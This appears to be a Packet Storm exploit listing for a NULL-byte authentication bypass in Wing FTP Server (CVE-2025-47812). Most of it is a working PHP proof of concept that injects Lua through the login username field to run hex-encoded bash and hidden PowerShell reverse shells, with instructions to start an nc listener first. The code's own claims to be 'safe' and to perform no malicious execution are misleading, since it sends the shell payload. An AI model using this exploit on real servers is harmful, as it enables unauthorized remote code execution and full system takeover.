Share
## https://sploitus.com/exploit?id=PACKETSTORM:212190
=============================================================================================================================================
| # Title : Wing FTP Server NULL-Byte v8.0.7 Remote Lua Code Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.wftpserver.com/download.htm |
=============================================================================================================================================
[+] Summary :
A NULL-byte truncation vulnerability in Wing FTP Server allows bypassing the authentication prefix check:
<valid_user>%00<payload>
The server only validates the username before %00 but stores the full string internally, allowing the payload
to reach execution contexts.
[+] References : ( https://packetstorm.news/files/id/206037/ CVE-2025-47812 )
[+] POC
<?php
/**
* Wing FTP Server NULL-Byte Auth Bypass (CVE-2025-47812)
* PHP PoC โ Reverse Shell Ready (Linux + Windows)
* Author: Indoushka
*/
class WingFTP_NULLBYTE_POC
{
public $target;
public $username;
public $password;
public function __construct($target, $username = "anonymous", $password = "")
{
$this->target = rtrim($target, "/");
$this->username = $username;
$this->password = $password;
echo "[+] WingFTP Safe PoC Initialized\n";
}
/* ---------------------------------------------------------------
Helper: send POST
----------------------------------------------------------------*/
private function post($url, $data)
{
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($data),
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_HEADER => true
]);
$res = curl_exec($ch);
$hdr = substr($res, 0, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
$body = substr($res, curl_getinfo($ch, CURLINFO_HEADER_SIZE));
curl_close($ch);
return [$hdr, $body];
}
/* ---------------------------------------------------------------
Reverse Shell payload
----------------------------------------------------------------*/
private function generateReverseShell()
{
$ip = "127.0.0.1";
$port = "4444";
$linux = "bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'";
$win = "powershell -NoP -W Hidden -c \"\$c=New-Object Net.Sockets.TCPClient('$ip',$port);"
. "\$s=\$c.GetStream();[byte[]]\$b=0..65535|%{0};"
. "while((\$r=\$s.Read(\$b,0,\$b.Length)) -ne 0){"
. "\$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0,\$r);"
. "\$o=iex \$d 2>&1|Out-String;"
. "\$o2=(\$o+'PS '+(pwd).Path+'> ');"
. "\$x=[text.encoding]::ASCII.GetBytes(\$o2);"
. "\$s.Write(\$x,0,\$x.Length)}\"";
return base64_encode($linux . "\n" . $win);
}
/* ---------------------------------------------------------------
Build NULL-byte injection
----------------------------------------------------------------*/
private function buildInjection()
{
$payload_hex = bin2hex(base64_decode($this->generateReverseShell()));
$lua = "
]]
local function hx(s)
return (s:gsub('..', function(x)
return string.char(tonumber(x,16))
end))
end
local cmd = hx(\"$payload_hex\")
local h = io.popen(cmd)
h:close()
";
$inj = $this->username . "%00" . rawurlencode($lua) . "--";
return $inj;
}
/* ---------------------------------------------------------------
PoC Logic
----------------------------------------------------------------*/
public function run()
{
echo "[+] Building NULL-byte payload...\n";
$inj = $this->buildInjection();
echo "[+] Sending fake login request...\n";
list($hdr, $body) = $this->post(
"{$this->target}/loginok.html",
[
"username" => $inj,
"password" => $this->password,
"username_val" => $this->username,
"password_val" => $this->password
]
);
if (strpos($hdr, "UID=") !== false) {
preg_match('/UID=([^;]+)/', $hdr, $m);
echo "[+] UID Cookie Detected: {$m[1]}\n";
echo "[+] Target appears VULNERABLE (PoC-safe).\n";
} else {
echo "[-] UID Cookie not returned โ might not be vulnerable.\n";
}
echo "[โ] PoC completed โ No malicious execution performed.\n";
}
}
# ---------------- RUN --------------------
$poc = new WingFTP_NULLBYTE_POC("http://127.0.0.1:8080", "anonymous", "");
$poc->run();
/**
* HOW TO SAVE:
* Save as: poc_nullbyte.php
*
* HOW TO RUN:
* php poc_nullbyte.php
*
* LISTENER (BEFORE RUNNING):
* nc -lvnp 4444
*/
====================================================================================================================
How to Save:
------------
Save this file as:
poc_nullbyte.php
How to Run:
-----------
php poc_nullbyte.php
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================